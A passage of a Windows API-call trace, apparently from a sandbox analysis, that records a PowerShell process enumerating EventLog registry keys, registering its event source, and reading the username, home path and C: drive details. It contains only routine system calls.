	[0724.273] RegOpenKeyExW (in: hKey=0x354, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d568 | out: phkResult=0x14d568*=0x0) returned 0x2
	[0724.273] RegOpenKeyExW (in: hKey=0x340, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d568 | out: phkResult=0x14d568*=0x358) returned 0x0
	[0724.273] RegOpenKeyExW (in: hKey=0x358, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d568 | out: phkResult=0x14d568*=0x0) returned 0x2
	[0724.273] RegOpenKeyExW (in: hKey=0x340, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d568 | out: phkResult=0x14d568*=0x35c) returned 0x0
	[0724.274] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d568 | out: phkResult=0x14d568*=0x0) returned 0x2
	[0724.274] RegOpenKeyExW (in: hKey=0x340, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d568 | out: phkResult=0x14d568*=0x360) returned 0x0
	[0724.274] RegOpenKeyExW (in: hKey=0x360, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d568 | out: phkResult=0x14d568*=0x0) returned 0x2
	[0724.274] RegOpenKeyExW (in: hKey=0x340, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d568 | out: phkResult=0x14d568*=0x364) returned 0x0
	[0724.274] RegOpenKeyExW (in: hKey=0x364, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d568 | out: phkResult=0x14d568*=0x368) returned 0x0
	[0724.274] RegCloseKey (hKey=0x368) returned 0x0
	[0724.274] RegCloseKey (hKey=0x340) returned 0x0
	[0724.275] RegCloseKey (hKey=0x364) returned 0x0
	[0724.276] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d508 | out: phkResult=0x14d508*=0x364) returned 0x0
	[0724.276] RegQueryInfoKeyW (in: hKey=0x364, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x14d47c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x14d478, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x14d47c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x14d478*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0724.276] CoTaskMemFree (pv=0x0) 
	[0724.276] CoTaskMemAlloc (cb=0x204) returned 0x2917a0
	[0724.276] RegEnumKeyExW (in: hKey=0x364, dwIndex=0x0, lpName=0x2917a0, lpcchName=0x14d508, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x14d508, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0724.276] CoTaskMemFree (pv=0x2917a0) 
	[0724.276] CoTaskMemFree (pv=0x0) 
	[0724.276] CoTaskMemAlloc (cb=0x204) returned 0x2917a0
	[0724.276] RegEnumKeyExW (in: hKey=0x364, dwIndex=0x1, lpName=0x2917a0, lpcchName=0x14d508, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x14d508, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0724.276] CoTaskMemFree (pv=0x2917a0) 
	[0724.276] CoTaskMemFree (pv=0x0) 
	[0724.276] CoTaskMemAlloc (cb=0x204) returned 0x2917a0
	[0724.276] RegEnumKeyExW (in: hKey=0x364, dwIndex=0x2, lpName=0x2917a0, lpcchName=0x14d508, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x14d508, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0724.276] CoTaskMemFree (pv=0x2917a0) 
	[0724.276] CoTaskMemFree (pv=0x0) 
	[0724.277] CoTaskMemAlloc (cb=0x204) returned 0x2917a0
	[0724.277] RegEnumKeyExW (in: hKey=0x364, dwIndex=0x3, lpName=0x2917a0, lpcchName=0x14d508, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x14d508, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0724.277] CoTaskMemFree (pv=0x2917a0) 
	[0724.277] CoTaskMemFree (pv=0x0) 
	[0724.277] CoTaskMemAlloc (cb=0x204) returned 0x2917a0
	[0724.277] RegEnumKeyExW (in: hKey=0x364, dwIndex=0x4, lpName=0x2917a0, lpcchName=0x14d508, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x14d508, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0724.277] CoTaskMemFree (pv=0x2917a0) 
	[0724.277] CoTaskMemFree (pv=0x0) 
	[0724.277] CoTaskMemAlloc (cb=0x204) returned 0x2917a0
	[0724.277] RegEnumKeyExW (in: hKey=0x364, dwIndex=0x5, lpName=0x2917a0, lpcchName=0x14d508, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x14d508, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0724.277] CoTaskMemFree (pv=0x2917a0) 
	[0724.277] CoTaskMemFree (pv=0x0) 
	[0724.277] CoTaskMemAlloc (cb=0x204) returned 0x2917a0
	[0724.277] RegEnumKeyExW (in: hKey=0x364, dwIndex=0x6, lpName=0x2917a0, lpcchName=0x14d508, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x14d508, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0724.277] CoTaskMemFree (pv=0x2917a0) 
	[0724.278] CoTaskMemFree (pv=0x0) 
	[0724.278] CoTaskMemAlloc (cb=0x204) returned 0x2917a0
	[0724.278] RegEnumKeyExW (in: hKey=0x364, dwIndex=0x7, lpName=0x2917a0, lpcchName=0x14d508, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x14d508, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0724.278] CoTaskMemFree (pv=0x2917a0) 
	[0724.278] CoTaskMemFree (pv=0x0) 
	[0724.278] CoTaskMemAlloc (cb=0x204) returned 0x2917a0
	[0724.278] RegEnumKeyExW (in: hKey=0x364, dwIndex=0x8, lpName=0x2917a0, lpcchName=0x14d508, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x14d508, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0724.278] CoTaskMemFree (pv=0x2917a0) 
	[0724.278] CoTaskMemFree (pv=0x0) 
	[0724.278] RegOpenKeyExW (in: hKey=0x364, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d568 | out: phkResult=0x14d568*=0x340) returned 0x0
	[0724.278] RegOpenKeyExW (in: hKey=0x340, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d568 | out: phkResult=0x14d568*=0x0) returned 0x2
	[0724.278] RegOpenKeyExW (in: hKey=0x364, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d568 | out: phkResult=0x14d568*=0x368) returned 0x0
	[0724.278] RegOpenKeyExW (in: hKey=0x368, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d568 | out: phkResult=0x14d568*=0x0) returned 0x2
	[0724.279] RegOpenKeyExW (in: hKey=0x364, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d568 | out: phkResult=0x14d568*=0x36c) returned 0x0
	[0724.279] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d568 | out: phkResult=0x14d568*=0x0) returned 0x2
	[0724.279] RegOpenKeyExW (in: hKey=0x364, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d568 | out: phkResult=0x14d568*=0x370) returned 0x0
	[0724.279] RegOpenKeyExW (in: hKey=0x370, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d568 | out: phkResult=0x14d568*=0x0) returned 0x2
	[0724.279] RegOpenKeyExW (in: hKey=0x364, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d568 | out: phkResult=0x14d568*=0x374) returned 0x0
	[0724.279] RegOpenKeyExW (in: hKey=0x374, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d568 | out: phkResult=0x14d568*=0x0) returned 0x2
	[0724.279] RegOpenKeyExW (in: hKey=0x364, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d568 | out: phkResult=0x14d568*=0x378) returned 0x0
	[0724.279] RegOpenKeyExW (in: hKey=0x378, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d568 | out: phkResult=0x14d568*=0x0) returned 0x2
	[0724.279] RegOpenKeyExW (in: hKey=0x364, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d568 | out: phkResult=0x14d568*=0x37c) returned 0x0
	[0724.280] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d568 | out: phkResult=0x14d568*=0x0) returned 0x2
	[0724.280] RegOpenKeyExW (in: hKey=0x364, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d568 | out: phkResult=0x14d568*=0x380) returned 0x0
	[0724.280] RegOpenKeyExW (in: hKey=0x380, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d568 | out: phkResult=0x14d568*=0x0) returned 0x2
	[0724.280] RegOpenKeyExW (in: hKey=0x364, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d568 | out: phkResult=0x14d568*=0x384) returned 0x0
	[0724.280] RegOpenKeyExW (in: hKey=0x384, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d568 | out: phkResult=0x14d568*=0x388) returned 0x0
	[0724.280] RegCloseKey (hKey=0x388) returned 0x0
	[0724.280] RegCloseKey (hKey=0x364) returned 0x0
	[0724.281] RegCloseKey (hKey=0x384) returned 0x0
	[0724.282] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d4d8 | out: phkResult=0x14d4d8*=0x384) returned 0x0
	[0724.282] RegQueryInfoKeyW (in: hKey=0x384, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x14d44c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x14d448, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x14d44c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x14d448*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0724.282] CoTaskMemFree (pv=0x0) 
	[0724.282] CoTaskMemAlloc (cb=0x204) returned 0x2917a0
	[0724.282] RegEnumKeyExW (in: hKey=0x384, dwIndex=0x0, lpName=0x2917a0, lpcchName=0x14d4d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x14d4d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0724.282] CoTaskMemFree (pv=0x2917a0) 
	[0724.282] CoTaskMemFree (pv=0x0) 
	[0724.282] CoTaskMemAlloc (cb=0x204) returned 0x2917a0
	[0724.282] RegEnumKeyExW (in: hKey=0x384, dwIndex=0x1, lpName=0x2917a0, lpcchName=0x14d4d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x14d4d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0724.282] CoTaskMemFree (pv=0x2917a0) 
	[0724.282] CoTaskMemFree (pv=0x0) 
	[0724.282] CoTaskMemAlloc (cb=0x204) returned 0x2917a0
	[0724.282] RegEnumKeyExW (in: hKey=0x384, dwIndex=0x2, lpName=0x2917a0, lpcchName=0x14d4d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x14d4d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0724.283] CoTaskMemFree (pv=0x2917a0) 
	[0724.283] CoTaskMemFree (pv=0x0) 
	[0724.283] CoTaskMemAlloc (cb=0x204) returned 0x2917a0
	[0724.283] RegEnumKeyExW (in: hKey=0x384, dwIndex=0x3, lpName=0x2917a0, lpcchName=0x14d4d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x14d4d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0724.283] CoTaskMemFree (pv=0x2917a0) 
	[0724.283] CoTaskMemFree (pv=0x0) 
	[0724.283] CoTaskMemAlloc (cb=0x204) returned 0x2917a0
	[0724.283] RegEnumKeyExW (in: hKey=0x384, dwIndex=0x4, lpName=0x2917a0, lpcchName=0x14d4d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x14d4d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0724.283] CoTaskMemFree (pv=0x2917a0) 
	[0724.283] CoTaskMemFree (pv=0x0) 
	[0724.283] CoTaskMemAlloc (cb=0x204) returned 0x2917a0
	[0724.283] RegEnumKeyExW (in: hKey=0x384, dwIndex=0x5, lpName=0x2917a0, lpcchName=0x14d4d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x14d4d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0724.283] CoTaskMemFree (pv=0x2917a0) 
	[0724.283] CoTaskMemFree (pv=0x0) 
	[0724.283] CoTaskMemAlloc (cb=0x204) returned 0x2917a0
	[0724.283] RegEnumKeyExW (in: hKey=0x384, dwIndex=0x6, lpName=0x2917a0, lpcchName=0x14d4d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x14d4d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0724.284] CoTaskMemFree (pv=0x2917a0) 
	[0724.284] CoTaskMemFree (pv=0x0) 
	[0724.284] CoTaskMemAlloc (cb=0x204) returned 0x2917a0
	[0724.284] RegEnumKeyExW (in: hKey=0x384, dwIndex=0x7, lpName=0x2917a0, lpcchName=0x14d4d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x14d4d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0724.284] CoTaskMemFree (pv=0x2917a0) 
	[0724.284] CoTaskMemFree (pv=0x0) 
	[0724.284] CoTaskMemAlloc (cb=0x204) returned 0x2917a0
	[0724.284] RegEnumKeyExW (in: hKey=0x384, dwIndex=0x8, lpName=0x2917a0, lpcchName=0x14d4d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x14d4d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0724.284] CoTaskMemFree (pv=0x2917a0) 
	[0724.284] CoTaskMemFree (pv=0x0) 
	[0724.284] RegOpenKeyExW (in: hKey=0x384, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d538 | out: phkResult=0x14d538*=0x364) returned 0x0
	[0724.284] RegOpenKeyExW (in: hKey=0x364, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d538 | out: phkResult=0x14d538*=0x0) returned 0x2
	[0724.284] RegOpenKeyExW (in: hKey=0x384, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d538 | out: phkResult=0x14d538*=0x388) returned 0x0
	[0724.285] RegOpenKeyExW (in: hKey=0x388, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d538 | out: phkResult=0x14d538*=0x0) returned 0x2
	[0724.285] RegOpenKeyExW (in: hKey=0x384, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d538 | out: phkResult=0x14d538*=0x38c) returned 0x0
	[0724.285] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d538 | out: phkResult=0x14d538*=0x0) returned 0x2
	[0724.285] RegOpenKeyExW (in: hKey=0x384, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d538 | out: phkResult=0x14d538*=0x390) returned 0x0
	[0724.285] RegOpenKeyExW (in: hKey=0x390, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d538 | out: phkResult=0x14d538*=0x0) returned 0x2
	[0724.285] RegOpenKeyExW (in: hKey=0x384, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d538 | out: phkResult=0x14d538*=0x394) returned 0x0
	[0724.285] RegOpenKeyExW (in: hKey=0x394, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d538 | out: phkResult=0x14d538*=0x0) returned 0x2
	[0724.285] RegOpenKeyExW (in: hKey=0x384, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d538 | out: phkResult=0x14d538*=0x398) returned 0x0
	[0724.285] RegOpenKeyExW (in: hKey=0x398, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d538 | out: phkResult=0x14d538*=0x0) returned 0x2
	[0724.286] RegOpenKeyExW (in: hKey=0x384, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d538 | out: phkResult=0x14d538*=0x39c) returned 0x0
	[0724.286] RegOpenKeyExW (in: hKey=0x39c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d538 | out: phkResult=0x14d538*=0x0) returned 0x2
	[0724.286] RegOpenKeyExW (in: hKey=0x384, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d538 | out: phkResult=0x14d538*=0x3a0) returned 0x0
	[0724.286] RegOpenKeyExW (in: hKey=0x3a0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d538 | out: phkResult=0x14d538*=0x0) returned 0x2
	[0724.286] RegOpenKeyExW (in: hKey=0x384, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d538 | out: phkResult=0x14d538*=0x3a4) returned 0x0
	[0724.286] RegOpenKeyExW (in: hKey=0x3a4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d538 | out: phkResult=0x14d538*=0x3a8) returned 0x0
	[0724.286] RegCloseKey (hKey=0x3a8) returned 0x0
	[0724.287] RegCloseKey (hKey=0x384) returned 0x0
	[0724.287] RegCloseKey (hKey=0x3a4) returned 0x0
	[0724.292] RegisterEventSourceW (lpUNCServerName=".", lpSourceName="PowerShell") returned 0x1b8c0008
	[0725.764] ReportEventW (hEventLog=0x1b8c0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2f26f98*="WSMan", lpRawData=0x2f26d08) returned 1
	[0725.766] CoTaskMemAlloc (cb=0x104) returned 0x1b7c99c0
	[0725.766] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7c99c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0725.766] CoTaskMemFree (pv=0x1b7c99c0) 
	[0725.767] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0725.768] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14cfc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0725.768] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14cfc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0725.768] CoTaskMemAlloc (cb=0x804) returned 0x280bb0
	[0725.768] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x280bb0, nSize=0x14d7c8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x14d7c8) returned 0x1
	[0725.769] CoTaskMemFree (pv=0x280bb0) 
	[0725.769] CoTaskMemAlloc (cb=0x204) returned 0x2917a0
	[0725.769] GetUserNameW (in: lpBuffer=0x2917a0, pcbBuffer=0x14d808 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x14d808) returned 1
	[0725.769] CoTaskMemFree (pv=0x2917a0) 
	[0725.770] ReportEventW (hEventLog=0x1b8c0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2f2c4d0*="Alias", lpRawData=0x2f2c260) returned 1
	[0725.771] CoTaskMemAlloc (cb=0x104) returned 0x1b7c99c0
	[0725.771] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7c99c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0725.771] CoTaskMemFree (pv=0x1b7c99c0) 
	[0725.773] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0725.773] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14cfc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0725.773] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14cfc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0725.774] CoTaskMemAlloc (cb=0x804) returned 0x280bb0
	[0725.774] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x280bb0, nSize=0x14d7c8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x14d7c8) returned 0x1
	[0725.774] CoTaskMemFree (pv=0x280bb0) 
	[0725.774] CoTaskMemAlloc (cb=0x204) returned 0x2917a0
	[0725.774] GetUserNameW (in: lpBuffer=0x2917a0, pcbBuffer=0x14d808 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x14d808) returned 1
	[0725.774] CoTaskMemFree (pv=0x2917a0) 
	[0725.775] ReportEventW (hEventLog=0x1b8c0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2f31ac8*="Environment", lpRawData=0x2f31858) returned 1
	[0725.776] CoTaskMemAlloc (cb=0x104) returned 0x1b7c99c0
	[0725.776] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7c99c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0725.776] CoTaskMemFree (pv=0x1b7c99c0) 
	[0725.779] CoTaskMemAlloc (cb=0x104) returned 0x1b7c99c0
	[0725.779] GetEnvironmentVariableW (in: lpName="HOMEDRIVE", lpBuffer=0x1b7c99c0, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0725.779] CoTaskMemFree (pv=0x1b7c99c0) 
	[0725.779] CoTaskMemAlloc (cb=0x104) returned 0x1b7c99c0
	[0725.779] GetEnvironmentVariableW (in: lpName="HOMEPATH", lpBuffer=0x1b7c99c0, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b
	[0725.779] CoTaskMemFree (pv=0x1b7c99c0) 
	[0725.780] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", nBufferLength=0x105, lpBuffer=0x14d370, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d
	[0725.780] SetErrorMode (uMode=0x1) returned 0x1
	[0725.780] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz"), fInfoLevelId=0x0, lpFileInformation=0x14d580 | out: lpFileInformation=0x14d580*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0725.780] SetErrorMode (uMode=0x1) returned 0x1
	[0725.781] GetLogicalDrives () returned 0x4
	[0725.782] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x14d0e0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0725.783] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0725.783] SetErrorMode (uMode=0x1) returned 0x1
	[0725.784] CoTaskMemAlloc (cb=0x68) returned 0x1b7d2100
	[0725.784] CoTaskMemAlloc (cb=0x68) returned 0x1b7d1f40
	[0725.784] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x1b7d2100, nVolumeNameSize=0x32, lpVolumeSerialNumber=0x14d550, lpMaximumComponentLength=0x14d54c, lpFileSystemFlags=0x14d548, lpFileSystemNameBuffer=0x1b7d1f40, nFileSystemNameSize=0x32 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x14d550*=0x9c354b42, lpMaximumComponentLength=0x14d54c*=0xff, lpFileSystemFlags=0x14d548*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1
	[0725.784] CoTaskMemFree (pv=0x1b7d2100) 
	[0725.784] CoTaskMemFree (pv=0x1b7d1f40) 
	[0725.785] SetErrorMode (uMode=0x1) returned 0x1
	[0725.785] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
